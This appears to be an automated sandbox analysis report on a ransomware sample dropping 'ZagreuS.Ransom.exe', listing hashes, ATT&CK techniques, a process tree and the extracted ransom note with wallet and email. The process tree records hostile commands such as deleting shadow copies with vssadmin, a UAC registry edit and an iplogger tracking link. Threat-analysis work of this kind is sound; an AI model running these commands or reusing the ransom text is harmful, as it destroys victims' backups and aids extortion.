Analysis

  • max time kernel
    140s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    20-05-2022 09:34

General

  • Target

    ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858.exe

  • Size

    750KB

  • MD5

    0f081afaae11c154edb8df747d612f93

  • SHA1

    7b1478e64453d78ff60eda7b1d2cc3623d4a9210

  • SHA256

    ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858

  • SHA512

    4b76bd14bcdf5a5e0a73fe630dc430968d59a7c132b00cb9e12674ff6d6472a726b5ed7796fa1481eb7e7b2aacdbc356a3b028c2b3eb2cbd13af1650f3d20628

Malware Config

Extracted

Path

C:\Users\Admin\Downloads\HELP_DECRYPT_YOUR_FILES.txt

Ransom Note
Oops All Of your important files were encrypted Like document pictures videos etc.. Don't worry, you can return all your files! All your files, documents, photos, databases and other important files are encrypted by a strong encryption. How to recover files? RSA is a asymmetric cryptographic algorithm, you need one key for encryption and one key for decryption so you need private key to recover your files. It’s not possible to recover your files without private key. The only method of recovering files is to purchase an unique private key.Only we can give you this key and only we can recover your files. What guarantees you have? As evidence, you can send us 1 file to decrypt by email We will send you a recovery file Prove that we can decrypt your file Please You must follow these steps carefully to decrypt your files: Send $1000 worth of bitcoin to wallet: bc1qtc9dpp69th34m5dsuadhparzmt9qqr7sukuw93 after payment,we will send you Decryptor software contact email: uncrushman@protonmail.com Your personal ID: d+CqXFl2O/KTCKkLIGn24IV/xeybqK8aqlJTrRsEpjlLQHfTUQDWmumoA43CRYw+PE8pVTrqImIJr94nZg379QuoqhtL5e+zTvZFVQO1GeTw9iFaWF21zWRJAjABm5A7K6ctx0Sbg+NpZC9kjfREpn7LKOWbw29W0J8HeExkyaQ=
Emails

uncrushman@protonmail.com

Signatures

  • UAC bypass 3 TTPs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Executes dropped EXE 1 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Generic Ransomware Note 7 IoCs

    Ransomware often writes a note containing information on how to pay the ransom.

  • HTTP links in PDF interactive object 1 IoCs

    Detects HTTP links in interactive objects within PDF files.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Interacts with shadow copies 2 TTPs 2 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies registry class 3 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 26 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858.exe
    "C:\Users\Admin\AppData\Local\Temp\ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858.exe"
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:2676
    • C:\Users\Admin\AppData\Local\Temp\ZagreuS.Ransom.exe
      "C:\Users\Admin\AppData\Local\Temp\ZagreuS.Ransom.exe"
      2⤵
      • Executes dropped EXE
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:2212
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2792
        • C:\Windows\System32\reg.exe
          C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f
          4⤵
          • Modifies registry key
          PID:3944
      • C:\Windows\SYSTEM32\cmd.exe
        "cmd.exe" /c vssadmin.exe delete shadows /all /quiet
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:216
        • C:\Windows\system32\vssadmin.exe
          vssadmin.exe delete shadows /all /quiet
          4⤵
          • Interacts with shadow copies
          PID:3828
      • C:\Windows\SYSTEM32\cmd.exe
        "cmd.exe" /c vssadmin.exe delete shadows /all /quiet
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4340
        • C:\Windows\system32\vssadmin.exe
          vssadmin.exe delete shadows /all /quiet
          4⤵
          • Interacts with shadow copies
          PID:376
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/2Y1Gy5
        3⤵
        • Enumerates system info in registry
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:520
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xf8,0x108,0x7ff8d82446f8,0x7ff8d8244708,0x7ff8d8244718
          4⤵
            PID:396
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2372,9427948889374246332,7321068856978116018,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2616 /prefetch:2
            4⤵
              PID:1132
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2372,9427948889374246332,7321068856978116018,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 /prefetch:3
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              PID:3000
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2372,9427948889374246332,7321068856978116018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3100 /prefetch:8
              4⤵
                PID:272
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2372,9427948889374246332,7321068856978116018,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3804 /prefetch:1
                4⤵
                  PID:4972
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2372,9427948889374246332,7321068856978116018,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3812 /prefetch:1
                  4⤵
                    PID:1284
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2372,9427948889374246332,7321068856978116018,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5196 /prefetch:8
                    4⤵
                      PID:4016
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2372,9427948889374246332,7321068856978116018,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5380 /prefetch:1
                      4⤵
                        PID:4464
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2372,9427948889374246332,7321068856978116018,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5512 /prefetch:8
                        4⤵
                          PID:5344
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2372,9427948889374246332,7321068856978116018,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5496 /prefetch:8
                          4⤵
                          • Modifies registry class
                          • Suspicious behavior: EnumeratesProcesses
                          PID:5360
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2372,9427948889374246332,7321068856978116018,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4080 /prefetch:1
                          4⤵
                            PID:5456
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2372,9427948889374246332,7321068856978116018,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6036 /prefetch:1
                            4⤵
                              PID:5596
                        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                          "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\31994-109-71389-1-10-20171224.pdf"
                          2⤵
                          • Checks processor information in registry
                          • Modifies Internet Explorer settings
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of FindShellTrayWindow
                          • Suspicious use of SetWindowsHookEx
                          • Suspicious use of WriteProcessMemory
                          PID:5072
                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                            "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
                            3⤵
                              PID:1528
                            • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                              "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
                              3⤵
                                PID:4420
                              • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
                                3⤵
                                • Suspicious use of WriteProcessMemory
                                PID:3784
                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=2A0B7BAA5C033A28282DFAB55F0BEF11 --mojo-platform-channel-handle=1732 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                                  4⤵
                                    PID:1612
                                  • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=323923313D96B7F837D85DEC113CB5F9 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=323923313D96B7F837D85DEC113CB5F9 --renderer-client-id=2 --mojo-platform-channel-handle=1748 --allow-no-sandbox-job /prefetch:1
                                    4⤵
                                      PID:4348
                                    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=0DED7F5902850FE667EDD412B999B57B --mojo-platform-channel-handle=2292 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                                      4⤵
                                        PID:4624
                                      • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=E15F59B4C3DFAB53F2767A4B791BA51C --mojo-platform-channel-handle=1848 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                                        4⤵
                                          PID:5068
                                        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                          "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=458959A6BD1D02DF34628D0731C430D9 --mojo-platform-channel-handle=1856 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                                          4⤵
                                            PID:4156
                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                            "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=FD52362937FB0629E1BBFD50C1581C72 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=FD52362937FB0629E1BBFD50C1581C72 --renderer-client-id=8 --mojo-platform-channel-handle=1908 --allow-no-sandbox-job /prefetch:1
                                            4⤵
                                              PID:3416
                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                            "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
                                            3⤵
                                              PID:4352
                                            • C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
                                              "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe" /PRODUCT:Reader /VERSION:19.0 /MODE:3
                                              3⤵
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of SetWindowsHookEx
                                              PID:4680
                                              • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Reader_sl.exe
                                                "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Reader_sl.exe"
                                                4⤵
                                                  PID:4388
                                          • C:\Windows\system32\vssvc.exe
                                            C:\Windows\system32\vssvc.exe
                                            1⤵
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:2816
                                          • C:\Windows\system32\NOTEPAD.EXE
                                            "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\HELP_DECRYPT_YOUR_FILES.txt
                                            1⤵
                                            • Opens file in notepad (likely ransom note)
                                            PID:4408
                                          • C:\Windows\System32\CompPkgSrv.exe
                                            C:\Windows\System32\CompPkgSrv.exe -Embedding
                                            1⤵
                                              PID:1168
                                            • C:\Windows\System32\mousocoreworker.exe
                                              C:\Windows\System32\mousocoreworker.exe -Embedding
                                              1⤵
                                                PID:4016

                                              Network

                                              MITRE ATT&CK Matrix ATT&CK v6

                                              Privilege Escalation

                                              Bypass User Account Control

                                              1
                                              T1088

                                              Defense Evasion

                                              Bypass User Account Control

                                              1
                                              T1088

                                              Disabling Security Tools

                                              1
                                              T1089

                                              Modify Registry

                                              3
                                              T1112

                                              File Deletion

                                              2
                                              T1107

                                              Discovery

                                              Query Registry

                                              3
                                              T1012

                                              System Information Discovery

                                              4
                                              T1082

                                              Command and Control

                                              Web Service

                                              1
                                              T1102

                                              Impact

                                              Inhibit System Recovery

                                              2
                                              T1490

                                              Replay Monitor

                                              Loading Replay Monitor...

                                              Downloads

                                              • C:\Users\Admin\AppData\Local\Temp\31994-109-71389-1-10-20171224.pdf
                                                Filesize

                                                519KB

                                                MD5

                                                f628a245651b09f63d2f888761d99543

                                                SHA1

                                                f004b9a7b6be37ba12d05167073cc2804b08ab64

                                                SHA256

                                                de51caa63ba814dc3aa4024a7ad2bf7b8e4ccdf7caf0f355857ab02a3d796bb6

                                                SHA512

                                                842b4cb2763df75215301213b705748cfd3377ce0dd467d7c9b6a8b7e3386964c1fb3fdef141b90c1012e76ebbef37e9759469b089c8d85db7cf9ca96ef2301d

                                              • C:\Users\Admin\AppData\Local\Temp\ZagreuS.Ransom.exe
                                                Filesize

                                                27KB

                                                MD5

                                                961d5eab06ae737f0425824c5cdb92d9

                                                SHA1

                                                56c76e63db1d7ba3eb44cf4f5e04b0976f56933a

                                                SHA256

                                                4f5f5ef38a63d201c4011606f03960a87534b9516ee9417b8cb39dff69d5e196

                                                SHA512

                                                56c66790e9adff70b1da48b74f17f6cde02940189248cb99538b0457eff31ddad8ce1e48e292473863c812afaa6295e39b32682abb2a4ca6d8933541a4da28fd

                                              • C:\Users\Admin\AppData\Local\Temp\ZagreuS.Ransom.exe
                                                Filesize

                                                27KB

                                                MD5

                                                961d5eab06ae737f0425824c5cdb92d9

                                                SHA1

                                                56c76e63db1d7ba3eb44cf4f5e04b0976f56933a

                                                SHA256

                                                4f5f5ef38a63d201c4011606f03960a87534b9516ee9417b8cb39dff69d5e196

                                                SHA512

                                                56c66790e9adff70b1da48b74f17f6cde02940189248cb99538b0457eff31ddad8ce1e48e292473863c812afaa6295e39b32682abb2a4ca6d8933541a4da28fd

                                              • C:\Users\Admin\Desktop\HELP_DECRYPT_YOUR_FILES.txt
                                                Filesize

                                                1KB

                                                MD5

                                                c93df85b757185a4197e3a9543e2de63

                                                SHA1

                                                6f2fe4fe24a9909b274659ec3d36f5ddf760c2ab

                                                SHA256

                                                f78e0256d3c310252d7a5bfaee6f5fe6bd0724b4d8df5a43645d015592162689

                                                SHA512

                                                635134e04dc11834a87240abeaeee9802fe57cf1abc0f6ead1aa3540e9a3b615891cd02894341026e18a47a057b4bc4738af60638801b394287a69b5e3f43569

                                              • \??\pipe\LOCAL\crashpad_520_KWKWARCZMZUVBAKD
                                                MD5

                                                d41d8cd98f00b204e9800998ecf8427e

                                                SHA1

                                                da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                SHA256

                                                e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                SHA512

                                                cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                              • memory/216-136-0x0000000000000000-mapping.dmp
                                              • memory/272-162-0x0000000000000000-mapping.dmp
                                              • memory/376-141-0x0000000000000000-mapping.dmp
                                              • memory/396-144-0x0000000000000000-mapping.dmp
                                              • memory/520-142-0x0000000000000000-mapping.dmp
                                              • memory/1132-158-0x0000000000000000-mapping.dmp
                                              • memory/1284-176-0x0000000000000000-mapping.dmp
                                              • memory/1528-145-0x0000000000000000-mapping.dmp
                                              • memory/1612-150-0x0000000000000000-mapping.dmp
                                              • memory/2212-139-0x00007FF8D6ED0000-0x00007FF8D7991000-memory.dmp
                                                Filesize

                                                10.8MB

                                              • memory/2212-133-0x0000000000520000-0x000000000052C000-memory.dmp
                                                Filesize

                                                48KB

                                              • memory/2212-130-0x0000000000000000-mapping.dmp
                                              • memory/2792-135-0x0000000000000000-mapping.dmp
                                              • memory/3000-159-0x0000000000000000-mapping.dmp
                                              • memory/3416-178-0x0000000000000000-mapping.dmp
                                              • memory/3784-147-0x0000000000000000-mapping.dmp
                                              • memory/3828-137-0x0000000000000000-mapping.dmp
                                              • memory/3944-138-0x0000000000000000-mapping.dmp
                                              • memory/4016-183-0x0000000000000000-mapping.dmp
                                              • memory/4156-171-0x0000000000000000-mapping.dmp
                                              • memory/4340-140-0x0000000000000000-mapping.dmp
                                              • memory/4348-153-0x0000000000000000-mapping.dmp
                                              • memory/4352-148-0x0000000000000000-mapping.dmp
                                              • memory/4388-187-0x0000000000000000-mapping.dmp
                                              • memory/4420-146-0x0000000000000000-mapping.dmp
                                              • memory/4464-185-0x0000000000000000-mapping.dmp
                                              • memory/4624-164-0x0000000000000000-mapping.dmp
                                              • memory/4680-186-0x0000000000000000-mapping.dmp
                                              • memory/4972-174-0x0000000000000000-mapping.dmp
                                              • memory/5068-167-0x0000000000000000-mapping.dmp
                                              • memory/5072-134-0x0000000000000000-mapping.dmp
                                              • memory/5344-189-0x0000000000000000-mapping.dmp
                                              • memory/5360-190-0x0000000000000000-mapping.dmp
                                              • memory/5456-192-0x0000000000000000-mapping.dmp
                                              • memory/5596-194-0x0000000000000000-mapping.dmp